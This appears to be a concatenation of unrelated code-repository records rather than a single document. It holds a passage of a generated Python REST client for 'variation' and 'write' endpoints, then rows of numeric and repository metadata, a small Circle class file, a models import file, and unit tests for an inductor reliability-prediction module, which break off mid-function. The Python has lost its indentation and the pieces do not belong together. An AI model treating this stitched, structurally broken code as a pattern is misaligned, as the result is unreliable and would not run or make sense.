kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.variation_delete_with_http_info(id, **kwargs)
else:
(data) = self.variation_delete_with_http_info(id, **kwargs)
return data
def variation_delete_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_delete_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: variation id to remove (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method variation_delete" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `variation_delete`")
resource_path = '/variation/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def variation_get(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_get(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Variation ID to open. (required)
:return: Variation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.variation_get_with_http_info(id, **kwargs)
else:
(data) = self.variation_get_with_http_info(id, **kwargs)
return data
def variation_get_with_http_info(self, id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_get_with_http_info(id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Variation ID to open. (required)
:return: Variation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method variation_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `variation_get`")
resource_path = '/variation/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Variation',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def variation_post(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_post(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Valid item id to bind variation to. (required)
:param Variation item: Variation information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.variation_post_with_http_info(id, item, **kwargs)
else:
(data) = self.variation_post_with_http_info(id, item, **kwargs)
return data
def variation_post_with_http_info(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_post_with_http_info(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Valid item id to bind variation to. (required)
:param Variation item: Variation information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'item']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method variation_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `variation_post`")
# verify the required parameter 'item' is set
if ('item' not in params) or (params['item'] is None):
raise ValueError("Missing the required parameter `item` when calling `variation_post`")
resource_path = '/variation/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'item' in params:
body_params = params['item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def variation_put(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_put(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: variation id to update. (required)
:param Variation item: New variation information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.variation_put_with_http_info(id, item, **kwargs)
else:
(data) = self.variation_put_with_http_info(id, item, **kwargs)
return data
def variation_put_with_http_info(self, id, item, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.variation_put_with_http_info(id, item, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: variation id to update. (required)
:param Variation item: New variation information. (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'item']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method variation_put" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params) or (params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `variation_put`")
# verify the required parameter 'item' is set
if ('item' not in params) or (params['item'] is None):
raise ValueError("Missing the required parameter `item` when calling `variation_put`")
resource_path = '/variation/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'item' in params:
body_params = params['item']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def write_delete(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.write_delete(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Will delete event attached to this serviceid
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.write_delete_with_http_info(**kwargs)
else:
(data) = self.write_delete_with_http_info(**kwargs)
return data
def write_delete_with_http_info(self, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.write_delete_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str id: Will delete event attached to this serviceid
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method write_delete" % key
)
params[key] = val
del params['kwargs']
resource_path = '/write/'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'id' in params:
query_params['id'] = params['id']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def write_post(self, event_request, **kwargs):
"""
Will ovveride the current event of the specified service.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.write_post(event_request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param EventRequest event_request: Event to upload (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.write_post_with_http_info(event_request, **kwargs)
else:
(data) = self.write_post_with_http_info(event_request, **kwargs)
return data
def write_post_with_http_info(self, event_request, **kwargs):
"""
Will ovveride the current event of the specified service.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.write_post_with_http_info(event_request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param EventRequest event_request: Event to upload (required)
:return: Response
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['event_request']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method write_post" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'event_request' is set
if ('event_request' not in params) or (params['event_request'] is None):
raise ValueError("Missing the required parameter `event_request` when calling `write_post`")
resource_path = '/write/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'event_request' in params:
body_params = params['event_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = ['APIKey', 'AccountID']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Response',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 38.353508
| 106
| 0.543808
| 11,105
| 111,532
| 5.260603
| 0.024403
| 0.073949
| 0.025882
| 0.033277
| 0.968281
| 0.96015
| 0.954912
| 0.950461
| 0.93889
| 0.914463
| 0
| 0.000143
| 0.372521
| 111,532
| 2,907
| 107
| 38.366701
| 0.834605
| 0.324024
| 0
| 0.816312
| 1
| 0
| 0.141969
| 0.026875
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040411
| false
| 0
| 0.005143
| 0
| 0.105805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bdd0765b4df1d053df5b4bcae0fe5e70b474232a
| 674
|
py
|
Python
|
python/Chapter1/Chapter1/testCircle.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter1/Chapter1/testCircle.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
python/Chapter1/Chapter1/testCircle.py
|
wboswall/academia
|
1571e8f9aceb21564f601cb79120ae56068fe3dd
|
[
"MIT"
] | null | null | null |
class Circle1:
def __init__(self, radius):
self.__radius = radius
def setRadius(self,newValue):
if newValue >= 0:
self.__radius = newValue
else: raise ValueError("Value must be positive")
def area(self):
return 3.14159 * (self.__radius ** 2)
class Circle2:
def __init__(self, radius):
self.__radius = radius
def __setRadius(self, newValue):
if newValue >= 0:
self.__radius = newValue
else: raise ValueError("Value must be positive")
radius = property(None, __setRadius)
@property
def area(self):
return 3.14159 * (self.__radius ** 2)
| 26.96
| 56
| 0.591988
| 75
| 674
| 5
| 0.333333
| 0.213333
| 0.058667
| 0.090667
| 0.842667
| 0.842667
| 0.842667
| 0.842667
| 0.842667
| 0.661333
| 0
| 0.038627
| 0.308605
| 674
| 24
| 57
| 28.083333
| 0.766094
| 0
| 0
| 0.7
| 0
| 0
| 0.065379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0
| 0
| 0.1
| 0.55
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
bdfcf5be805101420038f36ebccd59c4d36c40f2
| 117
|
py
|
Python
|
users/models/__init__.py
|
masssoud/hr-plus
|
96e6e10a87e6d09c6363b2078352b642a7b5e239
|
[
"MIT"
] | null | null | null |
users/models/__init__.py
|
masssoud/hr-plus
|
96e6e10a87e6d09c6363b2078352b642a7b5e239
|
[
"MIT"
] | 1
|
2020-06-10T06:34:36.000Z
|
2020-06-10T06:34:36.000Z
|
users/models/__init__.py
|
masssoud/hr-plus
|
96e6e10a87e6d09c6363b2078352b642a7b5e239
|
[
"MIT"
] | 3
|
2020-03-16T09:50:46.000Z
|
2020-04-29T07:03:09.000Z
|
from users.models.team import Team
from users.models.profile import Profile
from users.models.project import Project
| 29.25
| 40
| 0.846154
| 18
| 117
| 5.5
| 0.388889
| 0.272727
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 117
| 3
| 41
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
da10b02dd734ee99be91b93174bf30f6a3fa8523
| 19,714
|
py
|
Python
|
tests/analyses/milhdbk217f/models/inductor_unit_test.py
|
weibullguy/ramstk
|
3ec41d7e2933045a7a8028aed6c6b04365495095
|
[
"BSD-3-Clause"
] | 4
|
2018-08-26T09:11:36.000Z
|
2019-05-24T12:01:02.000Z
|
tests/analyses/milhdbk217f/models/inductor_unit_test.py
|
weibullguy/ramstk
|
3ec41d7e2933045a7a8028aed6c6b04365495095
|
[
"BSD-3-Clause"
] | 52
|
2018-08-24T12:51:22.000Z
|
2020-12-28T04:59:42.000Z
|
tests/analyses/milhdbk217f/models/inductor_unit_test.py
|
weibullguy/ramstk
|
3ec41d7e2933045a7a8028aed6c6b04365495095
|
[
"BSD-3-Clause"
] | 1
|
2018-10-11T07:57:55.000Z
|
2018-10-11T07:57:55.000Z
|
# pylint: skip-file
# type: ignore
# -*- coding: utf-8 -*-
#
# tests.analyses.milhdbk217f.models.inductor_unit_test.py is part of The
# RAMSTK Project
#
# All rights reserved.
# Copyright since 2007 Doyle "weibullguy" Rowland doyle.rowland <AT> reliaqual <DOT> com
"""Test class for the inductor module."""
# Third Party Imports
import pytest
# RAMSTK Package Imports
from ramstk.analyses.milhdbk217f import inductor
@pytest.mark.unit
@pytest.mark.parametrize("family_id", [1, 2, 3, 4])
@pytest.mark.parametrize(
"environment_active_id",
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_get_part_count_lambda_b_xfmr(family_id, environment_active_id):
"""get_part_count_lambda_b() should return a float value for the base hazard rate
on success."""
_lambda_b = inductor.get_part_count_lambda_b(
1,
environment_active_id,
family_id,
)
assert isinstance(_lambda_b, float)
assert (
_lambda_b
== {
1: [
0.0035,
0.023,
0.049,
0.019,
0.065,
0.027,
0.037,
0.041,
0.052,
0.11,
0.0018,
0.053,
0.16,
2.3,
],
2: [
0.0071,
0.046,
0.097,
0.038,
0.13,
0.055,
0.073,
0.081,
0.10,
0.22,
0.035,
0.11,
0.31,
4.7,
],
3: [
0.023,
0.16,
0.35,
0.13,
0.45,
0.21,
0.27,
0.35,
0.45,
0.82,
0.011,
0.37,
1.2,
16.0,
],
4: [
0.028,
0.18,
0.39,
0.15,
0.52,
0.22,
0.29,
0.33,
0.42,
0.88,
0.015,
0.42,
1.2,
19.0,
],
}[family_id][environment_active_id - 1]
)
@pytest.mark.unit
@pytest.mark.parametrize("family_id", [1, 2])
@pytest.mark.parametrize(
"environment_active_id",
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_get_part_count_lambda_b_inductor(
family_id,
environment_active_id,
):
"""get_part_count_lambda_b() should return a float value for the base hazard rate
on success."""
_lambda_b = inductor.get_part_count_lambda_b(
2,
environment_active_id,
family_id,
)
assert isinstance(_lambda_b, float)
assert (
_lambda_b
== {
1: [
0.0017,
0.0073,
0.023,
0.0091,
0.031,
0.011,
0.015,
0.016,
0.022,
0.052,
0.00083,
0.25,
0.073,
1.1,
],
2: [
0.0033,
0.015,
0.046,
0.018,
0.061,
0.022,
0.03,
0.033,
0.044,
0.10,
0.0017,
0.05,
0.15,
2.2,
],
}[family_id][environment_active_id - 1]
)
@pytest.mark.unit
def test_get_part_count_lambda_b_no_subcategory():
"""get_part_count_lambda_b() should raise a KeyError when passed an unknown
subcategory ID."""
with pytest.raises(KeyError):
inductor.get_part_count_lambda_b(
20,
3,
1,
)
@pytest.mark.unit
def test_get_part_count_lambda_b_no_family():
"""get_part_count_lambda_b() should raise a KeyError when passed an unknown family
ID."""
with pytest.raises(KeyError):
inductor.get_part_count_lambda_b(
2,
3,
12,
)
@pytest.mark.unit
def test_get_part_count_lambda_b_no_environment():
"""get_part_count_lambda_b() should raise an IndexError when passed an unknown
active environment ID."""
with pytest.raises(IndexError):
inductor.get_part_count_lambda_b(
2,
31,
1,
)
@pytest.mark.unit
@pytest.mark.usefixture("test_attributes_inductor")
@pytest.mark.parametrize("family_id", [1, 2])
@pytest.mark.parametrize(
"environment_active_id", [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
)
def test_calculate_part_count_inductor(
family_id,
environment_active_id,
test_attributes_inductor,
):
"""calculate_part_count() should return a float value for the base hazard rate on
success."""
test_attributes_inductor["subcategory_id"] = 2
test_attributes_inductor["family_id"] = family_id
test_attributes_inductor["environment_active_id"] = environment_active_id
_lambda_b = inductor.calculate_part_count(**test_attributes_inductor)
assert isinstance(_lambda_b, float)
assert (
_lambda_b
== {
1: [
0.0017,
0.0073,
0.023,
0.0091,
0.031,
0.011,
0.015,
0.016,
0.022,
0.052,
0.00083,
0.25,
0.073,
1.1,
],
2: [
0.0033,
0.015,
0.046,
0.018,
0.061,
0.022,
0.03,
0.033,
0.044,
0.10,
0.0017,
0.05,
0.15,
2.2,
],
}[family_id][environment_active_id - 1]
)
@pytest.mark.unit
@pytest.mark.usefixture("test_attributes_inductor")
@pytest.mark.parametrize("family_id", [1, 2, 3, 4])
@pytest.mark.parametrize(
"environment_active_id",
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_calculate_part_count_xfmr(
family_id,
environment_active_id,
test_attributes_inductor,
):
"""calculate_part_count() should return a float value for the base hazard rate on
success."""
test_attributes_inductor["subcategory_id"] = 1
test_attributes_inductor["family_id"] = family_id
test_attributes_inductor["environment_active_id"] = environment_active_id
_lambda_b = inductor.calculate_part_count(**test_attributes_inductor)
assert isinstance(_lambda_b, float)
assert (
_lambda_b
== {
1: [
0.0035,
0.023,
0.049,
0.019,
0.065,
0.027,
0.037,
0.041,
0.052,
0.11,
0.0018,
0.053,
0.16,
2.3,
],
2: [
0.0071,
0.046,
0.097,
0.038,
0.13,
0.055,
0.073,
0.081,
0.10,
0.22,
0.035,
0.11,
0.31,
4.7,
],
3: [
0.023,
0.16,
0.35,
0.13,
0.45,
0.21,
0.27,
0.35,
0.45,
0.82,
0.011,
0.37,
1.2,
16.0,
],
4: [
0.028,
0.18,
0.39,
0.15,
0.52,
0.22,
0.29,
0.33,
0.42,
0.88,
0.015,
0.42,
1.2,
19.0,
],
}[family_id][environment_active_id - 1]
)
@pytest.mark.unit
@pytest.mark.parametrize(
"page_number",
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14],
)
def test_get_temperature_rise_spec_sheet(page_number):
"""get_temperature_rise_spec_sheet() should return a float value for the
temperature_rise on success."""
_temperature_rise = inductor.get_temperature_rise_spec_sheet(page_number)
assert isinstance(_temperature_rise, float)
assert (
_temperature_rise
== {
1: 15.0,
2: 15.0,
3: 15.0,
4: 35.0,
5: 15.0,
6: 35.0,
7: 15.0,
8: 35.0,
9: 15.0,
10: 15.0,
11: 35.0,
12: 35.0,
13: 15.0,
14: 15.0,
}[page_number]
)
@pytest.mark.unit
@pytest.mark.usefixtures("test_attributes_inductor")
def test_get_temperature_rise_spec_id(test_attributes_inductor):
"""get_temperature_rise_spec_sheet() should return a float value for the
temperature_rise on success."""
test_attributes_inductor["subcategory_id"] = 2
test_attributes_inductor["specification_id"] = 2
test_attributes_inductor["page_number"] = 14
test_attributes_inductor = inductor.calculate_part_stress(
**test_attributes_inductor
)
assert isinstance(test_attributes_inductor["temperature_rise"], float)
assert test_attributes_inductor["temperature_rise"] == 15.0
@pytest.mark.unit
def test_get_temperature_rise_no_spec_sheet():
"""get_temperature_rise_spec_sheet() should raise a KeyError when passed an unkown
page number."""
with pytest.raises(KeyError):
inductor.get_temperature_rise_spec_sheet(22)
@pytest.mark.unit
def test_calculate_temperature_rise_input_power_weight():
"""calculate_temperature_rise_input_power_weight() should return a float value on
success."""
_temperature_rise = inductor.calculate_temperature_rise_input_power_weight(
0.387, 0.015
)
assert isinstance(_temperature_rise, float)
assert _temperature_rise == pytest.approx(13.93114825)
@pytest.mark.unit
def test_calculate_temperature_rise_input_power_weight_zero_weight():
"""calculate_temperature_rise_input_power_weight() should raise a ZeroDivisionError
when passed a weight=0.0."""
with pytest.raises(ZeroDivisionError):
inductor.calculate_temperature_rise_input_power_weight(0.387, 0.0)
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_surface():
"""calculate_temperature_rise_power_loss_surface() should return a float value on
success."""
_temperature_rise = inductor.calculate_temperature_rise_power_loss_surface(
0.387, 12.5
)
assert isinstance(_temperature_rise, float)
assert _temperature_rise == 3.87
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_surface_zero_area():
"""calculate_temperature_rise_power_loss_surface() should raise a ZeroDivisionError
when passed an area=0.0."""
with pytest.raises(ZeroDivisionError):
inductor.calculate_temperature_rise_power_loss_surface(0.387, 0.0)
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_weight():
"""calculate_temperature_rise_power_loss_radiating_surface() should return a float
value on success."""
_temperature_rise = inductor.calculate_temperature_rise_power_loss_weight(
0.387, 2.5
)
assert isinstance(_temperature_rise, float)
assert _temperature_rise == pytest.approx(2.394211958)
@pytest.mark.unit
def test_calculate_temperature_rise_power_loss_weight_zero_weight():
"""calculate_temperature_rise_power_loss_weight() should raise a ZeroDivisionError
when passed a weight=0.0."""
with pytest.raises(ZeroDivisionError):
inductor.calculate_temperature_rise_power_loss_weight(0.387, 0.0)
@pytest.mark.unit
def test_calculate_hot_spot_temperature():
"""calculate_hot_spot_temperature() should return a float value on success."""
_temperature_hot_spot = inductor.calculate_hot_spot_temperature(43.2, 38.7)
assert isinstance(_temperature_hot_spot, float)
assert _temperature_hot_spot == pytest.approx(85.77)
@pytest.mark.unit
def test_calculate_part_stress_lambda_b():
"""calculate_part_stress_lambda_b() should return a float value on success."""
_lambda_b = inductor.calculate_part_stress_lambda_b(1, 4, 85.77)
assert isinstance(_lambda_b, float)
assert _lambda_b == pytest.approx(0.00280133)
@pytest.mark.unit
def test_calculate_part_stress_lambda_b_no_subcategory():
"""calculate_part_stress_lambda_b() should raise an KeyError when passed an unknown
subcategory ID."""
with pytest.raises(KeyError):
inductor.calculate_part_stress_lambda_b(101, 4, 85.77)
@pytest.mark.unit
def test_calculate_part_stress_lambda_b_no_insulation():
"""calculate_part_stress_lambda_b() should raise an KeyError when passed an unknown
insulation ID."""
with pytest.raises(KeyError):
inductor.calculate_part_stress_lambda_b(1, 41, 85.77)
@pytest.mark.unit
@pytest.mark.parametrize("subcategory_id", [1, 2])
def test_get_part_stress_quality_factor(subcategory_id):
"""get_part_stress_quality_factor() should return a float value for piQ on
success."""
_pi_q = inductor.get_part_stress_quality_factor(subcategory_id, 1, 1)
assert isinstance(_pi_q, float)
assert _pi_q == {1: 1.5, 2: 0.03}[subcategory_id]
@pytest.mark.unit
@pytest.mark.usefixture("test_attributes_inductor")
def test_calculate_part_stress_inductor(test_attributes_inductor):
"""calculate_part_stress() should return a dictionary of updated values on
success."""
test_attributes_inductor["subcategory_id"] = 2
test_attributes_inductor["construction_id"] = 2
_attributes = inductor.calculate_part_stress(**test_attributes_inductor)
assert isinstance(_attributes, dict)
assert _attributes["lambda_b"] == pytest.approx(0.00046712295)
assert _attributes["piC"] == 2.0
assert _attributes["hazard_rate_active"] == pytest.approx(0.00014013688)
@pytest.mark.unit
@pytest.mark.usefixture("test_attributes_inductor")
def test_calculate_part_stress_xfmr_with_surface_area(test_attributes_inductor):
"""calculate_part_stress() should return a dictionary of updated values on
success."""
test_attributes_inductor["subcategory_id"] = 1
test_attributes_inductor["construction_id"] = 1
_attributes = inductor.calculate_part_stress(**test_attributes_inductor)
assert isinstance(_attributes, dict)
assert _attributes["lambda_b"] == pytest.approx(0.0026358035)
assert _attributes["piC"] == 1.0
assert _attributes["hazard_rate_active"] == pytest.approx(0.01976853)
@pytest.mark.unit
@pytest.mark.usefixture("test_attributes_inductor")
def test_calculate_part_stress_xfmr_with_weight(test_attributes_inductor):
"""calculate_part_stress() should return a dictionary of updated values on
success."""
test_attributes_inductor["subcategory_id"] = 1
test_attributes_inductor["construction_id"] = 1
test_attributes_inductor["power_operating"] = 0.387
test_attributes_inductor["voltage_dc_operating"] = 0.0
test_attributes_inductor["area"] = 0.0
test_attributes_inductor["weight"] = 2.5
_attributes = inductor.calculate_part_stress(**test_attributes_inductor)
assert isinstance(_attributes, dict)
assert _attributes["temperature_rise"] == pytest.approx(2.39421196)
assert _attributes["lambda_b"] == pytest.approx(0.0024684654)
assert _attributes["piC"] == 1.0
assert _attributes["hazard_rate_active"] == pytest.approx(0.01851349)
@pytest.mark.unit
@pytest.mark.usefixture("test_attributes_inductor")
def test_calculate_part_stress_xfmr_with_input_power(test_attributes_inductor):
"""calculate_part_stress() should return a dictionary of updated values on
success."""
test_attributes_inductor["subcategory_id"] = 1
test_attributes_inductor["construction_id"] = 1
test_attributes_inductor["power_operating"] = 0.0
test_attributes_inductor["voltage_dc_operating"] = 3.3
test_attributes_inductor["area"] = 0.0
test_attributes_inductor["weight"] = 2.5
_attributes = inductor.calculate_part_stress(**test_attributes_inductor)
assert isinstance(_attributes, dict)
assert _attributes["temperature_rise"] == pytest.approx(0.0040553804)
assert _attributes["lambda_b"] == pytest.approx(0.0024148713)
assert _attributes["piC"] == 1.0
assert _attributes["hazard_rate_active"] == pytest.approx(0.01811153)
@pytest.mark.unit
@pytest.mark.usefixture("test_attributes_inductor")
def test_calculate_part_stress_xfmr_no_temperature_rise(test_attributes_inductor):
"""calculate_part_stress() should return a dictionary of updated values on
